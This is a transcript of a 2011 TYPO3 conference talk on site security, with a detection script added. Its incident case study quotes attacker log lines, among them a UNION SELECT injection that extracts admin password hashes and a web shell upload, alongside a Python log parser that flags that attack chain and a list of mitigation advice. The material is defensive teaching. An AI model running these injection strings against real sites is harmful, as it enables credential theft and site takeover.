The document discusses a presentation about TYPO3 security risks and mitigation. It begins with an introduction of the presenter and an overview of topics to be covered, including what security is, general security concepts, common attack vectors, a case study of how a hacker exploited a vulnerability, and methods for mitigating risks.
TYPO Security - Risks and Mitigation of a TYPO3 Site Security Breach
1. TYPO3 Conference - San Francisco 2011
TYPO Security - Risks and Mitigation
Inspiring people to share
2. T3CON11 San Francisco
TYPO Security - Risks and Mitigation
10.06.2011
Helmut Hummel <helmut.hummel@typo3.org>
3. Introduction
About me
Involved in TYPO3 project since 2005
Member of the TYPO3 Security Team since 2008
TYPO3 Security Team Leader since 2009
TYPO3 Core Team Member since 2011
Employed at naw.info in Hannover, Germany
Twitter: helhum
Blog: http://www.naw.info/blogs/typo3security/
4. TYPO Security - Risks and Mitigation
Agenda
What is Security?
General Security Concepts
Attack Vectors
Knowing the Enemy: A Case Story
Mitigation
TYPO3 Security Team
5. What is Security?
6. Is TYPO3 secure?
Is my TYPO3 Site secure?
8-10. What is Security?
Criteria for Security
Privacy
Integrity and Property
Availability and Intentional Use
11. Security is a process, not a product.
(Bruce Schneier)
13-15. What is Security?
Security is a process
Care taking and improvements over time
Depending on your needs
Nothing is secure! Something can only be not insecure at a particular time
16-19. What is Security?
Why TYPO3 can be considered to be not insecure
TYPO3 Security Team takes care
Highly customizable for your needs
Few critical Security issues over time
23-26. General Security Concepts
Defense in depth
Minimize Exposure / Least privilege
Do not rely on security by obscurity
Log Activities
27. Attack Vectors
29-34. Attack Vectors
Security Issues in outdated TYPO3 Versions
Security Issues in (outdated) TYPO3 Extensions
Security Issues in TypoScript
Simple passwords
Compromised PC with FTP access
Other Software on the webserver
35. Knowing the Enemy
36. Knowing the Enemy
The incident, how did it happen?
[Hidden <div style="display:none;"> block injected into the site's HTML, containing dozens of spam links advertising software cracks]
37. Knowing the Enemy
Searching for vulnerabilities
178.122.0.0 - - [17/Dec/2010:14:01:43 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93' HTTP/1.1" 200 54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63"
38. Knowing the Enemy
Searching for vulnerabilities
178.122.0.0 - - [17/Dec/2010:14:02:30 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+--+ HTTP/1.1" 200 54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63"
39. Knowing the Enemy
Searching for vulnerabilities
14:03:09: tx_galleryexample_pi2[uid]=1192&tx_galleryexample_pi2[year]=2010
40. Knowing the Enemy
Searching for vulnerabilities
14:03:21: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010'
41. Knowing the Enemy
Searching for vulnerabilities
14:03:42: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010
42. Knowing the Enemy
Searching for vulnerabilities
14:04:15: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010 --
43. Knowing the Enemy
Found something!
14:04:38: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010 order by 10 --
44. Knowing the Enemy
Forging the exploit
14:08:38: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 --
45. Knowing the Enemy
Exploit working!
14:09:04: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=-2010 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,group_concat(concat_ws(0x3a3a,username,password,admin)),20,21,22 from be_users where admin=1 --
Now the hacker has the md5 hashes of all admin passwords
46. Knowing the Enemy
15 minutes later: Log in as admin!
14:21:48: /typo3/index.php
14:21:50: /typo3/backend.php
47. Knowing the Enemy
Uploading web shell
14:22:32: /typo3conf/ext/t3quixplorer/mod1/index.php?action=upload&dir=/typo3conf/ext/realurlmanagement/
14:22:46: /typo3conf/ext/realurlmanagement/title.php
You lose!
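The whole sequence on slides 37 to 47 (quote probe, column counting with ORDER BY / UNION SELECT, backend login, upload through an extension module, first hit on the dropped PHP file) is visible in the Apache access log, which is what the "Log Activities" principle buys you after the fact. The script below is an added example, not code from the talk: it parses constructed combined-log lines modelled on the slides (the second client IP, the host, the byte counts and the short user agents are placeholders), tags each request and correlates the tags per client IP into the stages of the case story.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Apache combined-log lines modelled on the slides (host, sizes, user agents
# and the second client IP are placeholders): two benign requests, then the attack.
SAMPLE_LOG = """\
178.122.0.0 - - [17/Dec/2010:14:00:10 +0100] "GET /glossary/?tx_a21glossary%5Buid%5D=93 HTTP/1.1" 200 54383 "-" "Opera/9.80"
203.0.113.7 - - [17/Dec/2010:14:01:02 +0100] "GET /gallery/?tx_galleryexample_pi2%5Buid%5D=1192&tx_galleryexample_pi2%5Byear%5D=2010 HTTP/1.1" 200 11873 "-" "Mozilla/5.0"
178.122.0.0 - - [17/Dec/2010:14:01:43 +0100] "GET /glossary/?tx_a21glossary%5Buid%5D=93' HTTP/1.1" 200 54383 "-" "Opera/9.80"
178.122.0.0 - - [17/Dec/2010:14:02:30 +0100] "GET /glossary/?tx_a21glossary%5Buid%5D=93+union+select+1,2,3+--+ HTTP/1.1" 200 54383 "-" "Opera/9.80"
178.122.0.0 - - [17/Dec/2010:14:04:38 +0100] "GET /gallery/?tx_galleryexample_pi2%5Buid%5D=979'&tx_galleryexample_pi2%5Byear%5D=2010+order+by+10+-- HTTP/1.1" 200 11873 "-" "Opera/9.80"
178.122.0.0 - - [17/Dec/2010:14:21:48 +0100] "POST /typo3/index.php HTTP/1.1" 302 0 "-" "Opera/9.80"
178.122.0.0 - - [17/Dec/2010:14:22:32 +0100] "POST /typo3conf/ext/t3quixplorer/mod1/index.php?action=upload&dir=/typo3conf/ext/realurlmanagement/ HTTP/1.1" 200 512 "-" "Opera/9.80"
178.122.0.0 - - [17/Dec/2010:14:22:46 +0100] "GET /typo3conf/ext/realurlmanagement/title.php HTTP/1.1" 200 64 "-" "Opera/9.80"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
UNION_RE = re.compile(r"\bunion\b.*?\bselect\b", re.I | re.S)
ORDER_RE = re.compile(r"\border\s+by\s+\d+", re.I)
STAGE_ORDER = ["sqli_probe", "sqli_enum", "backend_login", "ext_upload", "webshell_access"]


def parse_line(line):
    """Split one combined-log line; return None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"), "ts": m.group("ts"), "path": url.path,
        "status": int(m.group("status")),
        # decode %5B..%5D and '+' so the payload reads the way the database saw it
        "query": unquote_plus(url.query),
        "params": dict(parse_qsl(url.query, keep_blank_values=True)),
    }


def classify(req):
    """Tags for a single request, judged without any history."""
    tags = []
    q = req["query"]
    if UNION_RE.search(q) or ORDER_RE.search(q):
        tags.append("sqli_enum")        # column counting / UNION extraction
    elif "'" in q:
        tags.append("sqli_probe")       # weak on its own: search terms may contain apostrophes
    if req["path"].startswith("/typo3/index.php"):
        tags.append("backend_login")    # only meaningful after earlier stages (see analyze)
    if req["path"].startswith("/typo3conf/ext/") and req["params"].get("action") == "upload":
        tags.append("ext_upload")       # file upload through a backend extension module
    return tags


def analyze(log_text):
    """Walk the log in order and correlate per client IP through the stages of the
    case story. Returns (findings, history); findings are (ts, ip, stage, detail)."""
    history, findings = {}, []
    for line in log_text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        state = history.setdefault(req["ip"], {"stages": set(), "upload_dirs": set()})
        for tag in classify(req):
            if tag == "backend_login" and not state["stages"]:
                continue                # a plain backend login is normal admin activity
            if tag == "ext_upload":
                state["upload_dirs"].add(req["params"].get("dir", ""))
            state["stages"].add(tag)
            findings.append((req["ts"], req["ip"], tag, req["path"] + "?" + req["query"]))
        # a PHP file requested from a directory this client uploaded into = web shell use
        for d in state["upload_dirs"]:
            if d and req["path"].startswith(d) and req["path"].endswith(".php"):
                state["stages"].add("webshell_access")
                findings.append((req["ts"], req["ip"], "webshell_access", req["path"]))
    return findings, history


def kill_chain(history, ip):
    """Stages reached by one client, in attack order."""
    reached = history.get(ip, {"stages": set()})["stages"]
    return [s for s in STAGE_ORDER if s in reached]
```

The probe tag alone will fire on legitimate apostrophes, so alert on the chain (probe or enumeration followed by a backend login and an upload), not on single tags.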
49-53. Knowing the Enemy
Conclusion
Hackers know what they are doing
They know TYPO3 very well
They also use automated tools
They often try to obfuscate the hack
With automated attacks effort is low, gain is high
54. Mitigation
56-60. Mitigation
Mandatory steps
Monitor and Back Up your Website
Read the announce Mailing list and bulletins carefully
Use up to date Software
Use saltedpasswords and advise your admins (and users) to use non obvious passwords
Make your Integrators aware of possible TypoScript problems
62-65. Mitigation
Advanced steps
Use TYPO3 Core features in favour of extensions
Use protected backend access
Consider using mod_security
Consider using phpids TYPO3 Extension
66. TYPO3 Security Team
68-71. TYPO3 Security Team
Important things to know
Responsible Disclosure Policy
One communication channel (security@typo3.org)
Pre-Announcements for critical issues only
You can support us
72. TYPO Security - Risks and Mitigation
Resources
PHP-Sicherheit (Christopher Kunz and Stefan Esser)
Essential PHP Security (Chris Shiflett)
http://www.owasp.org/
http://typo3.org/teams/security/security-bulletins/
http://typo3.org/teams/security/resources/
http://buzz.typo3.org/teams/security/
73. Questions?
74. Thank You!
Web-Application Security, not personal nor governmental Security. Nevertheless there are similarities, which I use to explain.
Why is it important to define?
It depends ;)
Private things are kept private
* Walking in the house being naked
* Customer data not exposed
Nothing can be stolen
* Your TV is still there when you return home and it is still working
* Bank Accounts, Vouchers etc.
Nobody can use your „subject" for any other purpose than the one you intended
* Nobody sleeps in your bed, uses your Internet Connection for committing crime etc.
* Website is running and does not display SPAM links on your website
Caretaking:
* Replace broken, not working locks, don't use simple 3-number locks, even not for your oldest bike
* As hackers and hacker tools and computing power evolve, so the security concepts have to
* Established Security handling workflow

Your needs:
* Do you live in a small village in Canada or in New York (special bike-lock)
* Are you a Bank or just showing your gold fish breed on a website?
* The security efforts must relate to the possible impact:
* invest in resources taken for security / potential loss when hacked
-> If the effort to be hacked exceeds the gain, your system is secure
Nothing is secure by definition:
* The security of an application must be proven over time
Caretaking:
* All issues handled by the Sec-Team. No 0-Day exploits so far, everything (core) has been reported beforehand to us
* New Security features are being implemented (saltedpasswords, rsaauth)

Your needs:
* TYPO3 is highly customizable (login services, plugins etc.)
* e.g. Health information platform: encrypted webservice data (password hash is key)

Few critical Security issues over time
* Handled fast and reliably by the sec team
Defense in Depth:
* Onion principle
* fence, front door, curtains, bathroom/bedroom doors, Password for your computer, Safe
* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)

Minimize Exposure / Least privilege:
* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)

Obscurity:
* keys below the stone or above the door
* e.g. alternate telnet port; Database export in document root with „secret" name

Log:
* Even helpful _after_ an incident
* Cameras (Laptop theft software)
* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/php user) if possible)
Automated tools:
LizaMoon

Obfuscate:
Google conditional attack

Gain:
Even „small websites" are targeted
Monitoring:
* suspicious activity/load on server

Up to date Software:
* OS, PHP, TYPO3, Extensions
TYPO3 Core features:
* much better maintained and better codebase

Protected backend:
* NO FTP!, SSL, protect with http auth (only certain IPs)
RD:
* Publish issue with a fix (may take some time)
Communication:
* everything you suspect to be sec-related, let us know!
Pre-Announcement:
* If no pre-announcement is made, issue is not critical
* We try to release in the first half of the week (mostly Tuesday)
Support:
* Good Reports
* Send friendly reminders
* Donate money